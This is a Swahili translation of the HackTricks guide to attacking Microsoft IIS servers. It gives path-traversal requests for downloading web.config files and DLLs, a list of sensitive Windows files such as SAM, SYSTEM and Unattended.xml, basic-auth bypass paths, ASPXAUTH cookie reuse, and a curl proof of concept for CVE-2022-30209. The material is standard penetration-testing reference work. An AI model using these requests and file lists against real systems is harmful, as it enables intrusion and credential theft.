mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-29 16:10:54 +00:00
311 lines
16 KiB
Markdown
311 lines
16 KiB
Markdown
# IIS - Huduma za Taarifa za Mtandao
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
|
|
### [WhiteIntel](https://whiteintel.io)
|
|
|
|
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za kuiba**.
|
|
|
|
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
|
|
|
|
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
|
|
|
|
{% embed url="https://whiteintel.io" %}
|
|
|
|
***
|
|
|
|
Jaribu viendelezi vya faili za kutekelezeka:
|
|
|
|
* asp
|
|
* aspx
|
|
* config
|
|
* php
|
|
|
|
## Kufichua Anwani ya IP ya Ndani
|
|
|
|
Kwenye seva yoyote ya IIS ambapo unapata 302 unaweza kujaribu kuondoa kichwa cha Mwenyeji na kutumia HTTP/1.0 na ndani ya jibu kichwa cha Mahali kinaweza kukuelekeza kwenye anwani ya IP ya ndani:
|
|
```
|
|
nc -v domain.com 80
|
|
openssl s_client -connect domain.com:443
|
|
```
|
|
Jibu linalofichua anwani ya IP ya ndani:
|
|
```
|
|
GET / HTTP/1.0
|
|
|
|
HTTP/1.1 302 Moved Temporarily
|
|
Cache-Control: no-cache
|
|
Pragma: no-cache
|
|
Location: https://192.168.5.237/owa/
|
|
Server: Microsoft-IIS/10.0
|
|
X-FEServer: NHEXCHANGE2016
|
|
```
|
|
## Tekeleza faili za .config
|
|
|
|
Unaweza kupakia faili za .config na kuzitumia kutekeleza nambari. Moja ya njia ya kufanya hivyo ni kwa kuongeza nambari mwishoni mwa faili ndani ya maoni ya HTML: [Pakua mfano hapa](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
|
|
|
|
Taarifa zaidi na mbinu za kutumia udhaifu huu zinapatikana [hapa](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
|
|
|
|
## IIS Ugunduzi wa Nguvu ya Brute
|
|
|
|
Pakua orodha niliyoandaa:
|
|
|
|
{% file src="../../.gitbook/assets/iisfinal.txt" %}
|
|
|
|
Iliundwa kwa kuchanganya maudhui ya orodha zifuatazo:
|
|
|
|
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
|
|
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
|
|
[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\
|
|
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\
|
|
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
|
|
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
|
|
|
|
Tumia bila kuongeza kificho chochote, faili zinazohitaji zina tayari.
|
|
|
|
## Uvujaji wa Njia
|
|
|
|
### Kuvuja kwa nambari ya chanzo
|
|
|
|
Angalia andiko kamili hapa: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
|
|
|
|
{% hint style="info" %}
|
|
Kama muhtasari, kuna faili kadhaa za web.config ndani ya folda za programu zenye marejeleo kwa faili za "**assemblyIdentity**" na "**namespaces**". Kwa habari hii ni rahisi kujua **wapi faili za kutekelezwa zinapatikana** na kuzipakua.\
|
|
Kutoka kwa **Dlls zilizopakuliwa** pia ni rahisi kupata **namespaces mpya** ambapo unapaswa kujaribu kupata na kupata faili ya web.config ili kupata namespaces na assemblyIdentity mpya.\
|
|
Pia, faili za **connectionstrings.config** na **global.asax** zinaweza kuwa na habari muhimu.\\
|
|
{% endhint %}
|
|
|
|
Katika maombi ya **.Net MVC**, faili ya **web.config** inacheza jukumu muhimu kwa kutaja kila faili ya binary ambayo maombi yanategemea kupitia vitambulisho vya XML vya **"assemblyIdentity"**.
|
|
|
|
### **Kuchunguza Faili za Binary**
|
|
|
|
Mfano wa kupata faili ya **web.config** unaonyeshwa hapa chini:
|
|
```markup
|
|
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
|
|
Host: example-mvc-application.minded
|
|
```
|
|
Hii ombi inaonyesha mipangilio mbalimbali na mategemeo, kama vile:
|
|
|
|
* **EntityFramework** toleo
|
|
* **AppSettings** kwa kurasa za wavuti, uthibitishaji wa mteja, na JavaScript
|
|
* Mipangilio ya **System.web** kwa uthibitisho na wakati wa uendeshaji
|
|
* Mipangilio ya moduli za **System.webServer**
|
|
* Vifungo vya uundaji wa **Runtime** kwa maktaba nyingi kama **Microsoft.Owin**, **Newtonsoft.Json**, na **System.Web.Mvc**
|
|
|
|
Mipangilio hii inaonyesha kwamba faili fulani, kama vile **/bin/WebGrease.dll**, ziko ndani ya folda ya maombi /bin.
|
|
|
|
### **Faili za Daktari wa Mizizi**
|
|
|
|
Faili zilizopatikana katika daktari wa mizizi, kama vile **/global.asax** na **/connectionstrings.config** (ambayo ina nywila nyeti), ni muhimu kwa usanidi na uendeshaji wa maombi.
|
|
|
|
### **Namespaces na Web.Config**
|
|
|
|
Maombi ya MVC pia hufafanua faili za ziada za **web.config** kwa majina maalum ya kuzuia matangazo ya kurudia katika kila faili, kama ilivyoonyeshwa na ombi la kupakua **web.config** nyingine:
|
|
```markup
|
|
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
|
|
Host: example-mvc-application.minded
|
|
```
|
|
### **Kupakua DLLs**
|
|
|
|
Kutaja kwa nafasi ya desturi kunahisi kuna DLL iliyoitwa "**WebApplication1**" iliyopo kwenye saraka ya /bin. Kufuatia hili, ombi la kupakua **WebApplication1.dll** linaonyeshwa:
|
|
```markup
|
|
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
|
|
Host: example-mvc-application.minded
|
|
```
|
|
Hii inaashiria uwepo wa DLLs muhimu zingine, kama vile **System.Web.Mvc.dll** na **System.Web.Optimization.dll**, katika saraka ya /bin.
|
|
|
|
Katika hali ambapo DLL inaingiza nafasi ya jina inayoitwa **WebApplication1.Areas.Minded**, mshambuliaji anaweza kufikiria uwepo wa faili zingine za web.config katika njia zinazoweza kutabirika, kama vile **/jina-la-eneo/Views/**, zenye mazingira maalum na marejeleo kwa DLLs zingine katika saraka ya /bin. Kwa mfano, ombi kwa **/Minded/Views/web.config** inaweza kufichua mazingira na nafasi za majina zinazoonyesha uwepo wa DLL nyingine, **WebApplication1.AdditionalFeatures.dll**.
|
|
|
|
### Faili za Kawaida
|
|
|
|
Kutoka [hapa](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
|
|
```
|
|
C:\Apache\conf\httpd.conf
|
|
C:\Apache\logs\access.log
|
|
C:\Apache\logs\error.log
|
|
C:\Apache2\conf\httpd.conf
|
|
C:\Apache2\logs\access.log
|
|
C:\Apache2\logs\error.log
|
|
C:\Apache22\conf\httpd.conf
|
|
C:\Apache22\logs\access.log
|
|
C:\Apache22\logs\error.log
|
|
C:\Apache24\conf\httpd.conf
|
|
C:\Apache24\logs\access.log
|
|
C:\Apache24\logs\error.log
|
|
C:\Documents and Settings\Administrator\NTUser.dat
|
|
C:\php\php.ini
|
|
C:\php4\php.ini
|
|
C:\php5\php.ini
|
|
C:\php7\php.ini
|
|
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
|
|
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
|
|
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
|
|
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
|
|
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
|
|
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
|
|
c:\Program Files (x86)\php\php.ini"
|
|
C:\Program Files\Apache Group\Apache\conf\httpd.conf
|
|
C:\Program Files\Apache Group\Apache\conf\logs\access.log
|
|
C:\Program Files\Apache Group\Apache\conf\logs\error.log
|
|
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
|
|
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
|
|
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
|
|
C:\Program Files\FileZilla Server\FileZilla Server.xml
|
|
C:\Program Files\MySQL\my.cnf
|
|
C:\Program Files\MySQL\my.ini
|
|
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
|
|
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
|
|
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
|
|
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
|
|
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
|
|
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
|
|
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
|
|
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
|
|
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
|
|
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
|
|
C:\Program Files\php\php.ini
|
|
C:\Users\Administrator\NTUser.dat
|
|
C:\Windows\debug\NetSetup.LOG
|
|
C:\Windows\Panther\Unattend\Unattended.xml
|
|
C:\Windows\Panther\Unattended.xml
|
|
C:\Windows\php.ini
|
|
C:\Windows\repair\SAM
|
|
C:\Windows\repair\system
|
|
C:\Windows\System32\config\AppEvent.evt
|
|
C:\Windows\System32\config\RegBack\SAM
|
|
C:\Windows\System32\config\RegBack\system
|
|
C:\Windows\System32\config\SAM
|
|
C:\Windows\System32\config\SecEvent.evt
|
|
C:\Windows\System32\config\SysEvent.evt
|
|
C:\Windows\System32\config\SYSTEM
|
|
C:\Windows\System32\drivers\etc\hosts
|
|
C:\Windows\System32\winevt\Logs\Application.evtx
|
|
C:\Windows\System32\winevt\Logs\Security.evtx
|
|
C:\Windows\System32\winevt\Logs\System.evtx
|
|
C:\Windows\win.ini
|
|
C:\xampp\apache\conf\extra\httpd-xampp.conf
|
|
C:\xampp\apache\conf\httpd.conf
|
|
C:\xampp\apache\logs\access.log
|
|
C:\xampp\apache\logs\error.log
|
|
C:\xampp\FileZillaFTP\FileZilla Server.xml
|
|
C:\xampp\MercuryMail\MERCURY.INI
|
|
C:\xampp\mysql\bin\my.ini
|
|
C:\xampp\php\php.ini
|
|
C:\xampp\security\webdav.htpasswd
|
|
C:\xampp\sendmail\sendmail.ini
|
|
C:\xampp\tomcat\conf\server.xml
|
|
```
|
|
## Kosa la HTTPAPI 2.0 404
|
|
|
|
Ikiwa unaona kosa kama hili:
|
|
|
|
 (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
|
|
|
|
Inamaanisha kwamba **server haukupokea jina sahihi la kikoa** ndani ya kichwa cha Mwenyeji.\
|
|
Ili kupata ukurasa wa wavuti unaweza kutazama **Cheti cha SSL** kilichotolewa na labda unaweza kupata jina la kikoa/subdomain hapo. Ikiwa hakipo unaweza kuhitaji **kufanya VHosts za nguvu** hadi upate sahihi.
|
|
|
|
## Mapungufu ya zamani ya IIS yanayostahili kutafutwa
|
|
|
|
### Microsoft IIS tilde character "\~" Mporomoko/Wasilisho wa Jina Fupi la Faili/Folder
|
|
|
|
Unaweza kujaribu **kuorodhesha folda na faili** ndani ya kila folda iliyopatikana (hata kama inahitaji Uthibitishaji wa Msingi) kwa kutumia **njia hii**.\
|
|
Kizuizi kikuu cha njia hii ikiwa server ina mapungufu ni kwamba **inaweza kupata hadi herufi 6 za kwanza za jina la kila faili/folder na herufi 3 za kwanza za upanuzi** wa faili.
|
|
|
|
Unaweza kutumia [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) kujaribu mapungufu huu:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
|
|
|
|
.png>)
|
|
|
|
Utafiti wa awali: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
|
|
|
|
Unaweza pia kutumia **metasploit**: `tumia scanner/http/iis_shortname_scanner`
|
|
|
|
### Kupuuza Uthibitishaji wa Msingi
|
|
|
|
**Puuza** uthibitishaji wa msingi (**IIS 7.5**) kwa kujaribu kupata: `/admin:$i30:$INDEX_ALLOCATION/admin.php` au `/admin::$INDEX_ALLOCATION/admin.php`
|
|
|
|
Unaweza kujaribu **kuchanganya** mapungufu huu na ule wa mwisho kupata **folda mpya** na **kupuuza** uthibitishaji.
|
|
|
|
## Ufuatiliaji wa ASP.NET Trace.AXD ulioamilishwa kwa kufuatilia
|
|
|
|
ASP.NET inajumuisha hali ya ufuatiliaji na faili yake inaitwa `trace.axd`.
|
|
|
|
Inaendelea kumbukumbu ya kina ya maombi yote yaliyofanywa kwa programu kwa kipindi fulani cha wakati.
|
|
|
|
Maelezo haya ni pamoja na IP za wateja wa mbali, vitambulisho vya kikao, vidakuzi vyote vya ombi na majibu, njia za kimwili, habari ya msimbo wa chanzo, na labda hata majina ya watumiaji na nywila.
|
|
|
|
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
|
|
|
|
|
|
|
|
## Kuki ya ASPXAUTH
|
|
|
|
ASPXAUTH hutumia habari ifuatayo:
|
|
|
|
* **`validationKey`** (string): ufunguo ulio na hex ili kutumika kwa uthibitisho wa saini.
|
|
* **`decryptionMethod`** (string): (chaguo-msingi "AES").
|
|
* **`decryptionIV`** (string): vector ya kuanzisha iliyohex-iliyofungwa (chaguo-msingi ni vector ya sifuri).
|
|
* **`decryptionKey`** (string): ufunguo ulio na hex ili kutumika kwa kudekoda.
|
|
|
|
Hata hivyo, watu fulani watatumia **thamani za chaguo-msingi** za vigezo hivi na watatumia kama **kuki barua pepe ya mtumiaji**. Kwa hivyo, ikiwa unaweza kupata wavuti inayotumia **jukwaa sawa** linalotumia kuki ya ASPXAUTH na **kuunda mtumiaji na barua pepe ya mtumiaji unayetaka kujifanya** kwenye server inayoshambuliwa, unaweza kutumia **kuki kutoka kwa server ya pili kwenye ya kwanza** na kujifanya kuwa mtumiaji.\
|
|
Shambulio hili lilifanikiwa katika hii [**makala**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
|
|
|
|
## Kupuuza Uthibitishaji wa IIS kwa kutumia nywila zilizohifadhiwa (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
|
|
|
|
[Ripoti kamili hapa](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Kosa katika msimbo **haukuchunguza ipasavyo nywila iliyotolewa na mtumiaji**, kwa hivyo mshambuliaji ambaye **hashi ya nywila inagonga funguo** ambalo tayari lipo kwenye **cache** ataweza kuingia kama mtumiaji huyo.
|
|
```python
|
|
# script for sanity check
|
|
> type test.py
|
|
def HashString(password):
|
|
j = 0
|
|
for c in map(ord, password):
|
|
j = c + (101*j)&0xffffffff
|
|
return j
|
|
|
|
assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')
|
|
|
|
# before the successful login
|
|
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
|
|
HTTP/1.1 401 Unauthorized
|
|
|
|
# after the successful login
|
|
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
|
|
HTTP/1.1 200 OK
|
|
```
|
|
### [WhiteIntel](https://whiteintel.io)
|
|
|
|
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
|
|
|
|
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na zisizo za habari za kuiba.
|
|
|
|
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
|
|
|
|
{% embed url="https://whiteintel.io" %}
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|